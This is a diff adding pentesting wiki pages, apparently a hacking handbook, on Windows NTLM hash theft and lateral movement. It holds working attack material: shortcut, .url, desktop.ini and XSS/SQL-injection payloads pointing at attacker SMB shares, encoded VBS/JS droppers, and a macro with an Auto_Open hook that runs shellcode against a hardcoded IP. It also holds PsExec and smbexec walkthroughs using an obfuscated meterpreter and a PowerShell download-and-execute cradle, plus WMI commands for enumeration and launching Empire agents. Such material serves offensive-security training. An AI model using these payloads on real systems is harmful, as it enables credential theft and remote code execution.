+In Windows XP systems the desktop.ini file uses ‘IcondFile’ instead of ‘IconResource’.
+
+```text
+[.ShellClassInfo]
+IconFile=\\192.168.0.1\aa
+IconIndex=1337
+```
+
+## Shortcut Files \(.lnk\)
+
+We can create a shortcut containing our network path and as you as you open the shortcut Windows will try to resolve the network path. You can also specify a keyboard shortcut to trigger the shortcut. For the icon you can give the name of a Windows binary or choose an icon from either shell32.dll, Ieframe.dll, imageres.dll, pnidui.dll or wmploc.dll located in the system32 directory.
+
+```text
+Set shl = CreateObject("WScript.Shell")
+Set fso = CreateObject("Scripting.FileSystemObject")
+currentFolder = shl.CurrentDirectory
+ 
+Set sc = shl.CreateShortcut(fso.BuildPath(currentFolder, "\StealMyHashes.lnk"))
+ 
+sc.TargetPath = "\\35.164.153.224\@OsandaMalith"
+sc.WindowStyle = 1
+sc.HotKey = "Ctrl+Alt+O"
+sc.IconLocation = "%windir%\system32\shell32.dll, 3"
+sc.Description = "I will Steal your Hashes"
+sc.Save
+```
+
+The Powershell version.
+
+```text
+$objShell = New-Object -ComObject WScript.Shell
+$lnk = $objShell.CreateShortcut("StealMyHashes.lnk")
+$lnk.TargetPath = "\\35.164.153.224\@OsandaMalith"
+$lnk.WindowStyle = 1
+$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
+$lnk.Description = "I will Steal your Hashes"
+$lnk.HotKey = "Ctrl+Alt+O"
+$lnk.Save()
+```
+
+[![](https://osandamalith.files.wordpress.com/2017/03/shortcut2.png?w=640)](https://osandamalith.files.wordpress.com/2017/03/shortcut2.png)
+
+## Internet Shortcuts \(.url\)
+
+Another shortcut in Windows is the Internet shortcuts. You can save this as something.url
+
+```text
+echo [InternetShortcut] > stealMyHashes.url 
+echo URL=file://192.168.0.1/@OsandaMalith >> stealMyHashes.url
+```
+
+## Autorun with Registry
+
+You can add a new registry key in any of the following paths.
+
+```text
+HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
+HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
+HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
+HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
+```
+
+[![](https://osandamalith.files.wordpress.com/2017/03/registry.png?w=640)](https://osandamalith.files.wordpress.com/2017/03/registry.png)
+
+## Powershell
+
+There are probably many scriptlets in Powershell that would resolve a network path.
+
+```text
+Invoke-Item \\192.168.0.1\aa
+Get-Content \\192.168.0.1\aa
+Start-Process \\192.168.0.1\aa
+```
+
+## IE
+
+IE will resolve UNC paths. For example
+
+```text
+<img src="\\\\192.168.0.1\\aa"> 
+```
+
+You can inject under XSS or in scenarios you find SQL injection. For example.
+
+```text
+http://host.tld/?id=-1' union select 1,'<img src="\\\\192.168.0.1\\aa">';%00 
+```
+
+## VBScript
+
+You can save this as .vbs or can be used inside a macro that is applied to Word or Excel files.
+
+```text
+Set fso = CreateObject("Scripting.FileSystemObject")
+Set file = fso.OpenTextFile("//192.168.0.100/aa", 1)
+```
+
+You can apply in web pages but this works only with IE.
+
+```text
+<html>
+<script type="text/Vbscript">
+<!--
+Set fso = CreateObject("Scripting.FileSystemObject")
+Set file = fso.OpenTextFile("//192.168.0.100/aa", 1)
+//-->
+</script>
+</html>
+```
+
+Here’ the encoded version. You can encode and save this as something.vbe
+
+```text
+#@~^ZQAAAA==jY~6?}'ZM2mO2}4%+1YcEUmDb2YbxocorV?H/O+h6(LnmDE#=?nO,sksn{0dWcGa+U:+XYsbVcJJzf*cF*cF*2  yczmCE~8#XSAAAA==^#~@
+
+```
+
+You can apply this in html files too. But only works with IE. You can save this as something.hta which will be an HTML Application under windows, which mshta.exe will execute it. By default it uses IE.
+
+```text
+<html>
+<script type="text/Vbscript.Encode">
+<!--
+#@~^ZQAAAA==jY~6?}'ZM2mO2}4%+1YcEUmDb2YbxocorV?H/O+h6(LnmDE#=?nO,sksn{0dWcGa+U:+XYsbVcJJzf*cF*cF*2  yczmCE~8#XSAAAA==^#~@
+//-->
+</script>
+</html>
+```
+
+## JScript
+
+You can save this as something.js under windows.
+
+```text
+var fso = new ActiveXObject("Scripting.FileSystemObject")
+fso.FileExists("//192.168.0.103/aa")
+```
+
+You can apply the same in html files but only works with IE. Also you can save this as something.hta.
+
+```text
+<html>
+<script type="text/Jscript">
+<!--
+var fso = new ActiveXObject("Scripting.FileSystemObject")
+fso.FileExists("//192.168.0.103/aa")
+//-->
+</script>
+</html>
+```
+
+Here’s the encoded version. You can save this as something.jse.
+
+```text
+#@~^XAAAAA==-mD~6/K'xh,)mDk-+or8%mYvE?1DkaOrxTRwks+jzkYn:}8LmOE*i0dGcsrV3XkdD/vJzJFO+R8v0RZRqT2zlmE#Ux4AAA==^#~@
+```
+
+The html version of this.
+
+```text
+<html>
+<script type="text/Jscript.Encode">
+<!--
+#@~^XAAAAA==-mD~6/K'xh,)mDk-+or8%mYvE?1DkaOrxTRwks+jzkYn:}8LmOE*i0dGcsrV3XkdD/vJzJFO+R8v0RZRqT2zlmE#Ux4AAA==^#~@
+//-->
+</script>
+</html>
+```
+
+## Windows Script Files
+
+Save this as something.wsf.
+
+```text
+<package>
+  <job id="boom">
+    <script language="VBScript">
+       Set fso = CreateObject("Scripting.FileSystemObject")
+       Set file = fso.OpenTextFile("//192.168.0.100/aa", 1)
+    </script>
+   </job>
+</package>
+```
+
+## Shellcode
+
+Here’s a small shellcode I made. This shellcode uses CreateFile and tries to read a non-existing network path. You can use tools such as Responder to capture NetNTLM hashes. The shellcode can be modified to steal hashes over the internet. SMBRelay attacks can also be performed.
+
+```text
+/*
+    Title: CreateFile Shellcode
+    Author: Osanda Malith Jayathissa (@OsandaMalith)
+    Website: https://osandamalith.com
+    Size: 368 Bytes
+*/
+# include <stdlib.h>
+# include <stdio.h>
+# include <string.h>
+# include <windows.h>
+  
+int main() {
+ 
+  char *shellcode = 
+  "\xe8\xff\xff\xff\xff\xc0\x5f\xb9\x4c\x03\x02\x02\x81\xf1\x02\x02"
+  "\x02\x02\x83\xc7\x1d\x33\xf6\xfc\x8a\x07\x3c\x05\x0f\x44\xc6\xaa"
+  "\xe2\xf6\xe8\x05\x05\x05\x05\x5e\x8b\xfe\x81\xc6\x29\x01\x05\x05"
+  "\xb9\x02\x05\x05\x05\xfc\xad\x01\x3c\x07\xe2\xfa\x56\xb9\x8d\x10"
+  "\xb7\xf8\xe8\x5f\x05\x05\x05\x68\x31\x01\x05\x05\xff\xd0\xb9\xe0"
+  "\x53\x31\x4b\xe8\x4e\x05\x05\x05\xb9\xac\xd5\xaa\x88\x8b\xf0\xe8"
+  "\x42\x05\x05\x05\x6a\x05\x68\x80\x05\x05\x05\x6a\x03\x6a\x05\x6a"
+  "\x01\x68\x05\x05\x05\x80\x68\x3e\x01\x05\x05\xff\xd0\x6a\x05\xff"
+  "\xd6\x33\xc0\x5e\xc3\x33\xd2\xeb\x10\xc1\xca\x0d\x3c\x61\x0f\xbe"
+  "\xc0\x7c\x03\x83\xe8\x20\x03\xd0\x41\x8a\x01\x84\xc0\x75\xea\x8b"
+  "\xc2\xc3\x8d\x41\xf8\xc3\x55\x8b\xec\x83\xec\x14\x53\x56\x57\x89"
+  "\x4d\xf4\x64\xa1\x30\x05\x05\x05\x89\x45\xfc\x8b\x45\xfc\x8b\x40"
+  "\x0c\x8b\x40\x14\x89\x45\xec\x8b\xf8\x8b\xcf\xe8\xd2\xff\xff\xff"
+  "\x8b\x70\x18\x8b\x3f\x85\xf6\x74\x4f\x8b\x46\x3c\x8b\x5c\x30\x78"
+  "\x85\xdb\x74\x44\x8b\x4c\x33\x0c\x03\xce\xe8\x96\xff\xff\xff\x8b"
+  "\x4c\x33\x20\x89\x45\xf8\x33\xc0\x03\xce\x89\x4d\xf0\x89\x45\xfc"
+  "\x39\x44\x33\x18\x76\x22\x8b\x0c\x81\x03\xce\xe8\x75\xff\xff\xff"
+  "\x03\x45\xf8\x39\x45\xf4\x74\x1c\x8b\x45\xfc\x8b\x4d\xf0\x40\x89"
+  "\x45\xfc\x3b\x44\x33\x18\x72\xde\x3b\x7d\xec\x75\x9c\x33\xc0\x5f"
+  "\x5e\x5b\xc9\xc3\x8b\x4d\xfc\x8b\x44\x33\x24\x8d\x04\x48\x0f\xb7"
+  "\x0c\x30\x8b\x44\x33\x1c\x8d\x04\x88\x8b\x04\x30\x03\xc6\xeb\xdf"
+  "\x21\x05\x05\x05\x50\x05\x05\x05\x6b\x65\x72\x6e\x65\x6c\x33\x32"
+  "\x2e\x64\x6c\x6c\x05\x2f\x2f\x65\x72\x72\x6f\x72\x2f\x61\x61\x05";
+     
+  DWORD oldProtect;
+      
+    wprintf(L"Length : %d bytes\n@OsandaMalith", strlen(shellcode));
+    BOOL ret = VirtualProtect (shellcode, strlen(shellcode), PAGE_EXECUTE_READWRITE, &oldProtect);
+    
+    if (!ret) {
+        fprintf(stderr, "%s", "Error Occured");
+        return EXIT_FAILURE;
+    }
+    
+    ((void(*)(void))shellcode)();
+   
+    VirtualProtect (shellcode, strlen(shellcode), oldProtect, &oldProtect);
+    
+    return EXIT_SUCCESS;
+}
+```
+
+[https://packetstormsecurity.com/files/141707/CreateFile-Shellcode.html](https://packetstormsecurity.com/files/141707/CreateFile-Shellcode.html)
+
+[![](https://osandamalith.files.wordpress.com/2017/03/overintenert1.png?w=640)](https://osandamalith.files.wordpress.com/2017/03/overintenert1.png)
+
+## Shellcode Inside Macros
+
+Here’s the above shellcode applied inside a Word/Excel macro. You can use the same code inside a VB6 application.
+
+```text
+' Author : Osanda Malith Jayathissa (@OsandaMalith)
+' Title: Shellcode to request a non-existing network path
+' Website: https://osandamalith
+' Shellcode : https://packetstormsecurity.com/files/141707/CreateFile-Shellcode.html
+' This is a word/excel macro. This can be used in vb6 applications as well
+ 
+#If Vba7 Then
+    Private Declare PtrSafe Function CreateThread Lib "kernel32" ( _
+        ByVal lpThreadAttributes As Long, _
+        ByVal dwStackSize As Long, _ 
+        ByVal lpStartAddress As LongPtr, _
+        lpParameter As Long, _
+        ByVal dwCreationFlags As Long, _ 
+        lpThreadId As Long) As LongPtr
+ 
+ 
+    Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" ( _
+        ByVal lpAddress As Long, _
+        ByVal dwSize As Long, _
+        ByVal flAllocationType As Long, _
+        ByVal flProtect As Long) As LongPtr 
+ 
+    Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" ( _
+        ByVal Destination  As LongPtr, _
+        ByRef Source As Any, _
+        ByVal Length As Long) As LongPtr
+ 
+#Else
+    Private Declare Function CreateThread Lib "kernel32" ( _
+        ByVal lpThreadAttributes As Long, _
+        ByVal dwStackSize As Long, _
+        ByVal lpStartAddress As Long, _
+        lpParameter As Long, _
+        ByVal dwCreationFlags As Long, _
+        lpThreadId As Long) As Long
+ 
+    Private Declare Function VirtualAlloc Lib "kernel32" ( _
+        ByVal lpAddress As Long, _
+        ByVal dwSize As Long, _
+        ByVal flAllocationType As Long, _
+        ByVal flProtect As Long) As Long
+ 
+    Private Declare Function RtlMoveMemory Lib "kernel32" ( _
+        ByVal Destination As Long, _
+        ByRef Source As Any, _
+        ByVal Length As Long) As Long
+#EndIf
+ 
+Const MEM_COMMIT = &H1000
+Const PAGE_EXECUTE_READWRITE = &H40
+ 
+Sub Auto_Open()
+    Dim source As Long, i As Long
+#If Vba7 Then
+    Dim  lpMemory As LongPtr, lResult As LongPtr
+#Else
+    Dim  lpMemory As Long, lResult As Long
+#EndIf
+ 
+    Dim bShellcode(376) As Byte
+        bShellcode(0) = 232
+        bShellcode(1) = 255
+        bShellcode(2) = 255
+        bShellcode(3) = 255
+        bShellcode(4) = 255
+        bShellcode(5) = 192
+        bShellcode(6) = 95
+        bShellcode(7) = 185
+        bShellcode(8) = 85
+        bShellcode(9) = 3
+        bShellcode(10) = 2
+        bShellcode(11) = 2
+        bShellcode(12) = 129
+        bShellcode(13) = 241
+        bShellcode(14) = 2
+        bShellcode(15) = 2
+        bShellcode(16) = 2
+                .....................
+lpMemory = VirtualAlloc(0, UBound(bShellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE)
+    For i = LBound(bShellcode) To UBound(bShellcode)
+        source = bShellcode(i)
+        lResult = RtlMoveMemory(lpMemory + i, source, 1)
+    Next i
+    lResult = CreateThread(0, 0, lpMemory, 0, 0, 0)
+End Sub
+Sub AutoOpen()
+    Auto_Open
+End Sub
+Sub Workbook_Open()
+    Auto_Open
+End Sub
+```
+
+[https://github.com/OsandaMalith/Shellcodes/blob/master/CreateFile/CreateFile.vba](https://github.com/OsandaMalith/Shellcodes/blob/master/CreateFile/CreateFile.vba)
+
+## Shellcode Inside VBS and JS
+
+subTee has done many kinds of research with JS and DynamicWrapperX. You can find a POC using the DynamicWrapperX DLL.  
+[http://subt0x10.blogspot.com/2016/09/shellcode-via-jscript-vbscript.html](http://subt0x10.blogspot.com/2016/09/shellcode-via-jscript-vbscript.html)  
+Based on that I have ported the shellcode to JS and VBS. The fun part is we can embed shellcode in JScript or VBScript inside html and .hta formats.  
+Note the following shellcode directs to my IP.
+
+#### JScript
+
+```text
+/*
+ * Author : Osanda Malith Jayathissa (@OsandaMalith)
+ * Title: Shellcode to request a non-existing network path
+ * Website: https://osandamalith.com
+ * Shellcode : https://packetstormsecurity.com/files/141707/CreateFile-Shellcode.html
+ * Based on subTee's JS: https://gist.github.com/subTee/1a6c96df38b9506506f1de72573ceb04
+ */
+DX = new ActiveXObject("DynamicWrapperX"); 
+DX.Register("kernel32.dll", "VirtualAlloc", "i=luuu", "r=u");
+DX.Register("kernel32.dll","CreateThread","i=uullu","r=u" );
+DX.Register("kernel32.dll", "WaitForSingleObject", "i=uu", "r=u");
+ 
+var MEM_COMMIT = 0x1000;
+var PAGE_EXECUTE_READWRITE = 0x40;
+ 
+var sc = [
+0xe8, 0xff, 0xff, 0xff, 0xff, 0xc0, 0x5f, 0xb9, 0x55, 0x03, 0x02, 0x02, 0x81, 0xf1, 0x02, 0x02, 0x02, 0x02, 0x83, 0xc7,
+0x1d, 0x33, 0xf6, 0xfc, 0x8a, 0x07, 0x3c, 0x05, 0x0f, 0x44, 0xc6, 0xaa, 0xe2, 0xf6, 0xe8, 0x05, 0x05, 0x05, 0x05, 0x5e,
+0x8b, 0xfe, 0x81, 0xc6, 0x29, 0x01, 0x05, 0x05, 0xb9, 0x02, 0x05, 0x05, 0x05, 0xfc, 0xad, 0x01, 0x3c, 0x07, 0xe2, 0xfa,
+0x56, 0xb9, 0x8d, 0x10, 0xb7, 0xf8, 0xe8, 0x5f, 0x05, 0x05, 0x05, 0x68, 0x31, 0x01, 0x05, 0x05, 0xff, 0xd0, 0xb9, 0xe0,
+0x53, 0x31, 0x4b, 0xe8, 0x4e, 0x05, 0x05, 0x05, 0xb9, 0xac, 0xd5, 0xaa, 0x88, 0x8b, 0xf0, 0xe8, 0x42, 0x05, 0x05, 0x05,
+0x6a, 0x05, 0x68, 0x80, 0x05, 0x05, 0x05, 0x6a, 0x03, 0x6a, 0x05, 0x6a, 0x01, 0x68, 0x05, 0x05, 0x05, 0x80, 0x68, 0x3e,
+0x01, 0x05, 0x05, 0xff, 0xd0, 0x6a, 0x05, 0xff, 0xd6, 0x33, 0xc0, 0x5e, 0xc3, 0x33, 0xd2, 0xeb, 0x10, 0xc1, 0xca, 0x0d,
+0x3c, 0x61, 0x0f, 0xbe, 0xc0, 0x7c, 0x03, 0x83, 0xe8, 0x20, 0x03, 0xd0, 0x41, 0x8a, 0x01, 0x84, 0xc0, 0x75, 0xea, 0x8b,
+0xc2, 0xc3, 0x8d, 0x41, 0xf8, 0xc3, 0x55, 0x8b, 0xec, 0x83, 0xec, 0x14, 0x53, 0x56, 0x57, 0x89, 0x4d, 0xf4, 0x64, 0xa1,
+0x30, 0x05, 0x05, 0x05, 0x89, 0x45, 0xfc, 0x8b, 0x45, 0xfc, 0x8b, 0x40, 0x0c, 0x8b, 0x40, 0x14, 0x89, 0x45, 0xec, 0x8b,
+0xf8, 0x8b, 0xcf, 0xe8, 0xd2, 0xff, 0xff, 0xff, 0x8b, 0x70, 0x18, 0x8b, 0x3f, 0x85, 0xf6, 0x74, 0x4f, 0x8b, 0x46, 0x3c,
+0x8b, 0x5c, 0x30, 0x78, 0x85, 0xdb, 0x74, 0x44, 0x8b, 0x4c, 0x33, 0x0c, 0x03, 0xce, 0xe8, 0x96, 0xff, 0xff, 0xff, 0x8b,
+0x4c, 0x33, 0x20, 0x89, 0x45, 0xf8, 0x33, 0xc0, 0x03, 0xce, 0x89, 0x4d, 0xf0, 0x89, 0x45, 0xfc, 0x39, 0x44, 0x33, 0x18,
+0x76, 0x22, 0x8b, 0x0c, 0x81, 0x03, 0xce, 0xe8, 0x75, 0xff, 0xff, 0xff, 0x03, 0x45, 0xf8, 0x39, 0x45, 0xf4, 0x74, 0x1c,
+0x8b, 0x45, 0xfc, 0x8b, 0x4d, 0xf0, 0x40, 0x89, 0x45, 0xfc, 0x3b, 0x44, 0x33, 0x18, 0x72, 0xde, 0x3b, 0x7d, 0xec, 0x75,
+0x9c, 0x33, 0xc0, 0x5f, 0x5e, 0x5b, 0xc9, 0xc3, 0x8b, 0x4d, 0xfc, 0x8b, 0x44, 0x33, 0x24, 0x8d, 0x04, 0x48, 0x0f, 0xb7,
+0x0c, 0x30, 0x8b, 0x44, 0x33, 0x1c, 0x8d, 0x04, 0x88, 0x8b, 0x04, 0x30, 0x03, 0xc6, 0xeb, 0xdf, 0x21, 0x05, 0x05, 0x05,
+0x50, 0x05, 0x05, 0x05, 0x6b, 0x65, 0x72, 0x6e, 0x65, 0x6c, 0x33, 0x32, 0x2e, 0x64, 0x6c, 0x6c, 0x05, 0x2f, 0x2f, 0x33,
+0x35, 0x2e, 0x31, 0x36, 0x34, 0x2e, 0x31, 0x35, 0x33, 0x2e, 0x32, 0x32, 0x34, 0x2f, 0x61, 0x61, 0x05];
+ 
+var scLocation = DX.VirtualAlloc(0, sc.length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); 
+for(var i = 0; i < sc.length; i++) DX.NumPut(sc[i],scLocation,i);
+var thread = DX.CreateThread(0,0,scLocation,0,0);
+```
+
+[https://github.com/OsandaMalith/Shellcodes/blob/master/CreateFile/CreateFile.js](https://github.com/OsandaMalith/Shellcodes/blob/master/CreateFile/CreateFile.js)
+
+#### VBScript
+
+```text
+' Author : Osanda Malith Jayathissa (@OsandaMalith)
+' Title: Shellcode to request a non-existing network path
+' Website: https://osandamalith.com
+' Shellcode : https://packetstormsecurity.com/files/141707/CreateFile-Shellcode.html
+' Based on subTee's JS: https://gist.github.com/subTee/1a6c96df38b9506506f1de72573ceb04
+ 
+Set DX = CreateObject("DynamicWrapperX")
+DX.Register "kernel32.dll", "VirtualAlloc", "i=luuu", "r=u"
+DX.Register "kernel32.dll","CreateThread","i=uullu","r=u"
+DX.Register "kernel32.dll", "WaitForSingleObject", "i=uu", "r=u"
+ 
+Const MEM_COMMIT = &H1000
+Const PAGE_EXECUTE_READWRITE = &H40
+ 
+shellcode = Array( _
+&He8, &Hff, &Hff, &Hff, &Hff, &Hc0, &H5f, &Hb9, &H55, &H03, &H02, &H02, &H81, &Hf1, &H02, &H02, &H02, &H02, &H83, &Hc7, _
+&H1d, &H33, &Hf6, &Hfc, &H8a, &H07, &H3c, &H05, &H0f, &H44, &Hc6, &Haa, &He2, &Hf6, &He8, &H05, &H05, &H05, &H05, &H5e, _
+&H8b, &Hfe, &H81, &Hc6, &H29, &H01, &H05, &H05, &Hb9, &H02, &H05, &H05, &H05, &Hfc, &Had, &H01, &H3c, &H07, &He2, &Hfa, _
+&H56, &Hb9, &H8d, &H10, &Hb7, &Hf8, &He8, &H5f, &H05, &H05, &H05, &H68, &H31, &H01, &H05, &H05, &Hff, &Hd0, &Hb9, &He0, _ 
+&H53, &H31, &H4b, &He8, &H4e, &H05, &H05, &H05, &Hb9, &Hac, &Hd5, &Haa, &H88, &H8b, &Hf0, &He8, &H42, &H05, &H05, &H05, _
+&H6a, &H05, &H68, &H80, &H05, &H05, &H05, &H6a, &H03, &H6a, &H05, &H6a, &H01, &H68, &H05, &H05, &H05, &H80, &H68, &H3e, _
+&H01, &H05, &H05, &Hff, &Hd0, &H6a, &H05, &Hff, &Hd6, &H33, &Hc0, &H5e, &Hc3, &H33, &Hd2, &Heb, &H10, &Hc1, &Hca, &H0d, _
+&H3c, &H61, &H0f, &Hbe, &Hc0, &H7c, &H03, &H83, &He8, &H20, &H03, &Hd0, &H41, &H8a, &H01, &H84, &Hc0, &H75, &Hea, &H8b, _
+&Hc2, &Hc3, &H8d, &H41, &Hf8, &Hc3, &H55, &H8b, &Hec, &H83, &Hec, &H14, &H53, &H56, &H57, &H89, &H4d, &Hf4, &H64, &Ha1, _
+&H30, &H05, &H05, &H05, &H89, &H45, &Hfc, &H8b, &H45, &Hfc, &H8b, &H40, &H0c, &H8b, &H40, &H14, &H89, &H45, &Hec, &H8b, _
+&Hf8, &H8b, &Hcf, &He8, &Hd2, &Hff, &Hff, &Hff, &H8b, &H70, &H18, &H8b, &H3f, &H85, &Hf6, &H74, &H4f, &H8b, &H46, &H3c, _ 
+&H8b, &H5c, &H30, &H78, &H85, &Hdb, &H74, &H44, &H8b, &H4c, &H33, &H0c, &H03, &Hce, &He8, &H96, &Hff, &Hff, &Hff, &H8b, _
+&H4c, &H33, &H20, &H89, &H45, &Hf8, &H33, &Hc0, &H03, &Hce, &H89, &H4d, &Hf0, &H89, &H45, &Hfc, &H39, &H44, &H33, &H18, _
+&H76, &H22, &H8b, &H0c, &H81, &H03, &Hce, &He8, &H75, &Hff, &Hff, &Hff, &H03, &H45, &Hf8, &H39, &H45, &Hf4, &H74, &H1c, _
+&H8b, &H45, &Hfc, &H8b, &H4d, &Hf0, &H40, &H89, &H45, &Hfc, &H3b, &H44, &H33, &H18, &H72, &Hde, &H3b, &H7d, &Hec, &H75, _
+&H9c, &H33, &Hc0, &H5f, &H5e, &H5b, &Hc9, &Hc3, &H8b, &H4d, &Hfc, &H8b, &H44, &H33, &H24, &H8d, &H04, &H48, &H0f, &Hb7, _
+&H0c, &H30, &H8b, &H44, &H33, &H1c, &H8d, &H04, &H88, &H8b, &H04, &H30, &H03, &Hc6, &Heb, &Hdf, &H21, &H05, &H05, &H05, _
+&H50, &H05, &H05, &H05, &H6b, &H65, &H72, &H6e, &H65, &H6c, &H33, &H32, &H2e, &H64, &H6c, &H6c, &H05, &H2f, &H2f, &H33, _
+&H35, &H2e, &H31, &H36, &H34, &H2e, &H31, &H35, &H33, &H2e, &H32, &H32, &H34, &H2f, &H61, &H61, &H05)
+ 
+scLocation = DX.VirtualAlloc(0, UBound(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE)
+ 
+For i =LBound(shellcode) to UBound(shellcode)
+    DX.NumPut shellcode(i),scLocation,i
+Next
+ 
+thread = DX.CreateThread (0,0,scLocation,0,0)
+```
+
+[https://github.com/OsandaMalith/Shellcodes/blob/master/CreateFile/CreateFile.vbs](https://github.com/OsandaMalith/Shellcodes/blob/master/CreateFile/CreateFile.vbs)
+
+There might be many other ways in Windows. You never know! 🙂
+
+### References
+
+[https://attack.mitre.org/techniques/T1187/](https://attack.mitre.org/techniques/T1187/)
+
diff --git a/windows/ntlm/psexec-and-winexec.md b/windows/ntlm/psexec-and-winexec.md
new file mode 100644
index 00000000..e74340c0
--- /dev/null
+++ b/windows/ntlm/psexec-and-winexec.md
@@ -0,0 +1,39 @@
+# PsExec/Winexec/ScExec
+
+## How do they work
+
+1. Copy a service binary to the ADMIN$ share over SMB
+2. Create a service on the remote machine pointing to the binary
+3. Remotely start the service
+4. When exited, stop the service and delete the binary
+
+## **Manually PsExec'ing**
+
+First let's assume we have a payload executable we generated with msfvenom and obfuscated with Veil \(so AV doesn't flag it\). In this case, I created a meterpreter reverse\_http payload and called it 'met8888.exe'
+
+**Copy the binary**. From our "jarrieta" command prompt, simply copy the binary to the ADMIN$. Really though, it could be copied and hidden anywhere on the filesystem.
+
+![](../../.gitbook/assets/copy_binary_admin.png)
+
+**Create a service**. The Windows `sc` command is used to query, create, delete, etc Windows services and can be used remotely. Read more about it [here](https://technet.microsoft.com/en-us/library/bb490995.aspx). From our command prompt, we'll remotely create a service called "meterpreter" that points to our uploaded binary:
+
+![](../../.gitbook/assets/sc_create.png)
+
+**Start the service**. The last step is to start the service and execute the binary. _Note:_ when the service starts it will "time-out" and generate an error. That's because our meterpreter binary isn't an actual service binary and won't return the expected response code. That's fine because we just need it to execute once to fire:
+
+![](../../.gitbook/assets/sc_start_error.png)
+
+If we look at our Metasploit listener, we'll see the session has been opened.
+
+**Clean the service.**
+
+![](../../.gitbook/assets/sc_delete.png)
+
+Extracted from here: [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
+
+**You could also use the Windows Sysinternals binary PsExec.exe:**
+
+![](../../.gitbook/assets/image%20%28151%29.png)
+
+
+
diff --git a/windows/ntlm/smbexec.md b/windows/ntlm/smbexec.md
new file mode 100644
index 00000000..2d911d88
--- /dev/null
+++ b/windows/ntlm/smbexec.md
@@ -0,0 +1,44 @@
+# SmbExec/ScExec
+
+## How does it works
+
+**Smbexec works like Psexec.** In this example**,** **instead** of pointing the "_binpath_" to a malicious executable inside the victim, we are going to **point it** to **cmd.exe or powershell.exe** and one of they will download and execute the backdoor.
+
+## **SMBExec**
+
+Let's see what happens when smbexec runs by looking at it from the attackers and target's side:
+
+![](../../.gitbook/assets/smbexec_prompt.png)
+
+So we know it creates a service "BTOBTO". But that service isn't present on the target machine when we do an `sc query`. The system logs reveal a clue to what happened:
+
+![](../../.gitbook/assets/smbexec_service.png)
+
+The Service File Name contains a command string to execute \(%COMSPEC% points to the absolute path of cmd.exe\). It echoes the command to be executed to a bat file, redirects the stdout and stderr to a Temp file, then executes the bat file and deletes it. Back on Kali, the Python script then pulls the output file via SMB and displays the contents in our "pseudo-shell". For every command we type into our "shell", a new service is created and the process is repeated. This is why it doesn't need to drop a binary, it just executes each desired command as a new service. Definitely more stealthy, but as we saw, an event log is created for every command executed. Still a very clever way to get a non-interactive "shell"!
+
+## Manual SMBExec
+
+**Or executing commands via services**
+
+As smbexec demonstrated, it's possible to execute commands directly from service binPaths instead of needing a binary. This can be a useful trick to keep in your back pocket if you need to just execute one arbitrary command on a target Windows machine. As a quick example, let's get a Meterpreter shell using a remote service _without_ a binary.
+
+We'll use Metasploit's `web_delivery` module and choose a PowerShell target with a reverse Meterpreter payload. The listener is set up and it tells us the command to execute on the target machine:
+
+```text
+powershell.exe -nop -w hidden -c $k=new-object net.webclient;$k.proxy=[Net.WebRequest]::GetSystemWebProxy();$k.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $k.downloadstring('http://10.9.122.8:8080/AZPLhG9txdFhS9n');  
+```
+
+From our Windows attack box, we create a remote service \("metpsh"\) and set the binPath to execute cmd.exe with our payload:
+
+![](../../.gitbook/assets/sc_psh_create.png)
+
+And then start it:
+
+![](../../.gitbook/assets/sc_psh_start.png)
+
+It errors out because our service doesn't respond, but if we look at our Metasploit listener we see that the callback was made and the payload executed.
+
+
+
+All the info was extracted from here: [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
+
diff --git a/windows/ntlm/winrm.md b/windows/ntlm/winrm.md
new file mode 100644
index 00000000..e2aae244
--- /dev/null
+++ b/windows/ntlm/winrm.md
@@ -0,0 +1,4 @@
+# WinRM
+
+For information about ****[**WinRM read this page**](../../pentesting/5985-5986-pentesting-winrm.md).
+
diff --git a/windows/ntlm/wmicexec.md b/windows/ntlm/wmicexec.md
new file mode 100644
index 00000000..ebc8207b
--- /dev/null
+++ b/windows/ntlm/wmicexec.md
@@ -0,0 +1,51 @@
+# WmicExec
+
+## How Does it works
+
+Wmi allows to open process in hosts where you know username/\(password/Hash\). Then, Wmiexec uses wmi to execute each command that is asked to execute \(this is why Wmicexec gives you semi-interactive shell\).
+
+**dcomexec.py:** This script gives a semi-interactive shell similar to wmiexec.py, but using different DCOM endpoints \(ShellBrowserWindow DCOM object\). Currently, it supports MMC20. Application, Shell Windows and Shell Browser Window objects. \(from [here](https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/)\)
+
+## WMIC
+
+From an attacker's perspective, WMI can be very valuable in enumerating sensitive information about a system or the domain.
+
+```text
+wmic computerystem list full /format:list  
+wmic process list /format:list  
+wmic ntdomain list /format:list  
+wmic useraccount list /format:list  
+wmic group list /format:list  
+wmic sysaccount list /format:list  
+```
+
+## **Manual Remote WMI Querying**
+
+For example, here's a very stealthy way to discover local admins on a remote machine \(note that domain is the computer name\):
+
+```text
+wmic /node:ordws01 path win32_groupuser where (groupcomponent="win32_group.name=\"administrators\",domain=\"ORDWS01\"")  
+```
+
+Another useful oneliner is to see who is logged on to a machine \(for when you're hunting admins\):
+
+```text
+wmic /node:ordws01 path win32_loggedonuser get antecedent  
+```
+
+`wmic` can even read nodes from a text file and execute the command on all of them. If you have a text file of workstations:
+
+```text
+wmic /node:@workstations.txt path win32_loggedonuser get antecedent  
+```
+
+**We'll remotely create a process over WMI to execute a Empire agent:**
+
+```text
+wmic /node:ordws01 /user:CSCOU\jarrieta path win32_process call create "**empire launcher string here**"  
+```
+
+We see it executed successfully \(ReturnValue = 0\). And a second later our Empire listener catches it. Note the process ID is the same as WMI returned.
+
